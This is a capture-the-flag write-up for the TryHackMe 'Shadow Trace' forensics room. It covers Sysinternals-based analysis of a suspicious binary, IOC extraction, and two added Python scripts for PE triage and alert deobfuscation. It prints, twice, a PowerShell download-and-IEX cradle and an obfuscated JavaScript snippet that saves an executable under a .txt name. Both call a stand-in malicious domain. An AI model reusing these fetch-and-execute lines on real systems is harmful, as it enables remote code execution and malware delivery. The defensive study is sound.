# Shadow Trace — TryHackMe

### Description

Analyse a suspicious file, uncover hidden clues, and trace the source of the infection.

Helpful resource giving an overview of the tools used for each task:

- [https://learn.microsoft.com/en-us/sysinternals/](https://learn.microsoft.com/en-us/sysinternals/)

# Task 2 - File Analysis

#### Note

- Analyse the binary located at `C:\Users\DFIRUser\Desktop\windows-update.exe`

## What is the architecture of the binary file windows-update.exe?

Tool - **Process Explorer** (Sysinternals)

![Pasted image 20251011105246](https://hackmd.io/_uploads/Sk3Rqj_pgx.png)

After opening the process in **Process Explorer** and inspecting `windows-update.exe`, the Environment tab shows:

```
PROCESSOR_ARCHITECTURE = AMD64
```

A 32-bit process running under WOW64 would instead see `PROCESSOR_ARCHITECTURE=x86` (with `PROCESSOR_ARCHITEW6432=AMD64`), so AMD64 here means the process is running natively as x64, i.e. the binary is **64-bit**. The same answer can be confirmed without running the sample from the Image Type column in Process Explorer or from the `MachineType` line that sigcheck prints alongside the hashes below.

![Pasted image 20251011111128](https://hackmd.io/_uploads/BJIxoo_pxg.png)

**`Answer: 64-bit`**

## What is the hash (sha-256) of the file windows-update.exe?

Using **sigcheck** from `C:\Users\DFIRUser\DFIR Tools\SysinternalsSuite`

Command:

```cmd
sigcheck -h C:\Users\DFIRUser\Desktop\windows-update.exe
```

Where `-h` prints the file hashes (MD5, SHA-1, SHA-256 and others) together with the signature and version information. The SHA-256 value should match what PowerShell's `Get-FileHash` reports for the same file; record it as a file-based IOC.

Answer:

![Pasted image 20251011113728](https://hackmd.io/_uploads/rJxMjiuagl.png)

## Identify the URL within the file to use it as an IOC

You can extract strings from the binary to locate embedded URLs using **strings** from the same SysinternalsSuite folder (it prompts for the EULA on first run):

```cmd
strings C:\Users\DFIRUser\Desktop\windows-update.exe
```

Alternatively, the Strings tab of the process properties in Process Explorer lists the printable strings of the image on disk and, with the Memory option, of the running process, which is a dynamic way to inspect text the binary only builds at runtime. Open the process and inspect the strings.

![Pasted image 20251011114431](https://hackmd.io/_uploads/rJTGosuagg.png)

**Answer: `http://tryhatme.com/update/security-update.exe`**

## With the URL identified, can you spot a domain that can be used as an IOC?
![Pasted image 20251011120847](https://hackmd.io/_uploads/HJomsjOpge.png)

The strings output contains a second host on the same `tryhatme.com` domain, which is a separate network IOC from the download URL above.

**Answer: `responses.tryhatme.com`**

## Input the decoded flag from the suspicious domain

![Pasted image 20251011115214](https://hackmd.io/_uploads/BJU4ioOaxg.png)

![Pasted image 20251011115247](https://hackmd.io/_uploads/HyMrji_Tle.png)

**Answer: `THM{you_g0t_some_IOCs_friend}`**

## What library related to socket communication is loaded by the binary?

Tool - **Listdlls** (Sysinternals)

Running Listdlls against the process lists every module loaded into it; `Ws2_32.dll` is the Winsock 2 library that provides the socket API (`socket`, `connect`, `send`, `recv`), which is consistent with the binary reaching out to the URL found above.

**Answer: `Ws2_32.dll`**

# Task 3 - Alerts Analysis

![Pasted image 20251011130118](https://hackmd.io/_uploads/S1bLss_pge.png)

## Can you identify the malicious URL from the alert triggered by the process powershell.exe?

PowerShell command observed:

```powershell
(new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl"))) | IEX;
```

The command Base64-decodes the embedded string into a URL, downloads the content at that URL with `WebClient.DownloadString`, and pipes the result to `IEX` (`Invoke-Expression`), so whatever the server returns is executed in memory without touching disk. Decode the Base64 string yourself rather than running the command; decoding it reveals the malicious URL.

![Pasted image 20251011125801](https://hackmd.io/_uploads/rk1wji_all.png)

**Answer: `https://tryhatme.com/dev/main.exe`**

## Can you identify the malicious URL from the alert triggered by chrome.exe?

JavaScript snippet observed:

```javascript
fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,100,97,116,101,46,101,120,101].map(c=>String.fromCharCode(c)).join('')).then(r=>r.blob()).then(b=>{const u=URL.createObjectURL(b);const a=document.createElement('a');a.href=u;a.download='test.txt';document.body.appendChild(a);a.click();a.remove();URL.revokeObjectURL(u);});
```

The array of character codes, mapped through `String.fromCharCode` and joined, is the URL. The script fetches it, wraps the response in a Blob, and triggers a download by clicking a synthetic anchor element, so the `.exe` lands on disk under the innocuous name set by `a.download`.

**Answer: `https://reallysecureupdate.tryhatme.com/update.exe`**

## What's the name of the file saved in the alert triggered by chrome.exe?

The filename comes from the `a.download='test.txt'` assignment, not from the URL, so the saved file is an executable disguised with a `.txt` name.

**Answer: `test.txt`**
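The Task 2 steps above (architecture, SHA-256, URL and domain IOCs) can be scripted so the same triage runs on any PE sample without executing it. The following is an added example and not part of the TryHackMe room or the Sysinternals tools; it reads the COFF `Machine` field directly from the PE header instead of relying on the process environment, and extracts ASCII and UTF-16LE strings the way `strings` does. The `build_demo_pe` helper constructs a minimal, non-executable PE-shaped byte string (an assumption for the demo) carrying the room's URL and domain so the script runs offline.

```python
"""Static triage of a Windows PE sample: architecture, SHA-256 and URL/domain IOCs."""
import hashlib
import re
import struct

# IMAGE_FILE_HEADER.Machine values from the PE/COFF specification.
MACHINE_TYPES = {
    0x014C: "32-bit (x86)",
    0x8664: "64-bit (x64)",
    0xAA64: "64-bit (ARM64)",
    0x01C4: "32-bit (ARMv7)",
}

URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
BARE_HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
ASCII_STR_RE = re.compile(rb"[\x20-\x7e]{6,}")
WIDE_STR_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
# Module/file names look like hostnames to a naive regex; drop the common ones.
IGNORE_SUFFIXES = (".exe", ".dll", ".pdb", ".sys", ".ocx", ".txt")


def pe_architecture(data: bytes) -> str:
    """Return the machine type from the COFF header, or 'not a PE' if headers are missing."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not a PE"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return "not a PE"
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]  # first COFF field
    return MACHINE_TYPES.get(machine, f"unknown machine 0x{machine:04x}")


def sha256_hex(data: bytes) -> str:
    """File hash IOC, same value sigcheck -h / Get-FileHash report."""
    return hashlib.sha256(data).hexdigest()


def extract_strings(data: bytes) -> list:
    """Printable ASCII and UTF-16LE runs of 6+ characters, like strings.exe."""
    found = [m.group().decode("ascii") for m in ASCII_STR_RE.finditer(data)]
    found += [m.group().decode("utf-16le") for m in WIDE_STR_RE.finditer(data)]
    return found


def extract_iocs(data: bytes):
    """Return (urls, domains): URLs plus bare hostnames, excluding module-like names."""
    urls, domains = set(), set()
    for s in extract_strings(data):
        for url in URL_RE.findall(s):
            urls.add(url)
            host = url.split("://", 1)[1].split("/", 1)[0].split(":")[0]
            domains.add(host.lower())
        for host in BARE_HOST_RE.findall(s):
            if not host.lower().endswith(IGNORE_SUFFIXES):
                domains.add(host.lower())
    return sorted(urls), sorted(domains)


def triage(data: bytes) -> dict:
    urls, domains = extract_iocs(data)
    return {"arch": pe_architecture(data), "sha256": sha256_hex(data),
            "urls": urls, "domains": domains}


def build_demo_pe(machine: int, payload: bytes) -> bytes:
    """Constructed minimal PE-shaped image (DOS header, PE signature, COFF header,
    payload). It is NOT a runnable executable; it only exercises the parser above."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header follows the DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)
    return bytes(dos) + b"PE\x00\x00" + coff + payload


# Constructed sample payload using the room's own indicators; the double NUL
# between strings keeps the UTF-16 scanner from fusing the two runs.
DEMO_PAYLOAD = (b"\x00" * 16
                + b"http://tryhatme.com/update/security-update.exe\x00\x00"
                + "responses.tryhatme.com".encode("utf-16le") + b"\x00\x00")
DEMO_SAMPLE = build_demo_pe(0x8664, DEMO_PAYLOAD)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else DEMO_SAMPLE
    for key, value in triage(data).items():
        print(f"{key}: {value}")
```

Run it with the path to the sample as the only argument; with no argument it triages the constructed demo image. On a real binary the string scanner will also surface import names and library paths, which is why the suffix filter exists; review the domain list by hand before adding anything to a blocklist.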
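Both Task 3 alerts hide the URL behind a reversible encoding (a Base64 argument to `FromBase64String` in the PowerShell alert, a character-code array fed to `String.fromCharCode` in the Chrome alert). The following is an added example and not part of the TryHackMe room: it recovers the URLs and the `a.download` filename from the alert command lines as pure string processing, so the analyst never has to run the payload. The two command lines are reproduced from the alerts above; the regexes and function names are this example's own.

```python
"""Recover URLs from obfuscated alert command lines without executing them."""
import base64
import binascii
import re

URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
B64_CALL_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
CHARCODE_ARRAY_RE = re.compile(r"\[\s*(\d{1,3}(?:\s*,\s*\d{1,3}){3,})\s*\]")
DOWNLOAD_NAME_RE = re.compile(r"\.download\s*=\s*['\"]([^'\"]+)['\"]")


def decode_base64_layers(payload: str):
    """Yield the decoded text of every FromBase64String("...") argument.
    UTF-8 first (matches the UTF8.GetString seen in the alert), UTF-16LE as a
    fallback for -EncodedCommand style payloads; invalid Base64 is skipped."""
    for b64 in B64_CALL_RE.findall(payload):
        try:
            raw = base64.b64decode(b64, validate=True)
        except binascii.Error:
            continue
        try:
            yield raw.decode("utf-8")
        except UnicodeDecodeError:
            yield raw.decode("utf-16le", errors="replace")


def decode_charcode_arrays(payload: str):
    """Yield the string behind each [n,n,...] array whose values are all printable ASCII."""
    for arr in CHARCODE_ARRAY_RE.findall(payload):
        codes = [int(n) for n in arr.split(",")]
        if all(0x20 <= c <= 0x7E for c in codes):
            yield "".join(map(chr, codes))


def deobfuscate(payload: str) -> dict:
    """Return decoded layers, every URL found in the raw or decoded text, and any
    filename assigned to an anchor's download attribute."""
    decoded = list(decode_base64_layers(payload)) + list(decode_charcode_arrays(payload))
    urls = sorted({u for text in [payload, *decoded] for u in URL_RE.findall(text)})
    return {"decoded": decoded, "urls": urls,
            "download_names": DOWNLOAD_NAME_RE.findall(payload)}


# The two command lines from the alerts above, reproduced verbatim.
POWERSHELL_ALERT = (
    '(new-object system.net.webclient).DownloadString([Text.Encoding]::UTF8.GetString('
    '[Convert]::FromBase64String("aHR0cHM6Ly90cnloYXRtZS5jb20vZGV2L21haW4uZXhl"))) | IEX;'
)
CHROME_ALERT = (
    "fetch([104,116,116,112,115,58,47,47,114,101,97,108,108,121,115,101,99,117,114,101,"
    "117,112,100,97,116,101,46,116,114,121,104,97,116,109,101,46,99,111,109,47,117,112,"
    "100,97,116,101,46,101,120,101].map(c=>String.fromCharCode(c)).join('')).then(r=>r.blob())"
    ".then(b=>{const u=URL.createObjectURL(b);const a=document.createElement('a');a.href=u;"
    "a.download='test.txt';document.body.appendChild(a);a.click();a.remove();"
    "URL.revokeObjectURL(u);});"
)

if __name__ == "__main__":
    for name, alert in (("powershell.exe", POWERSHELL_ALERT), ("chrome.exe", CHROME_ALERT)):
        result = deobfuscate(alert)
        print(name, "->", result["urls"], result["download_names"])
```

The same two functions apply to any command-line or script field exported from the SIEM; a decoded string that still contains `FromBase64String(` or another array can simply be fed back through `deobfuscate` for the next layer.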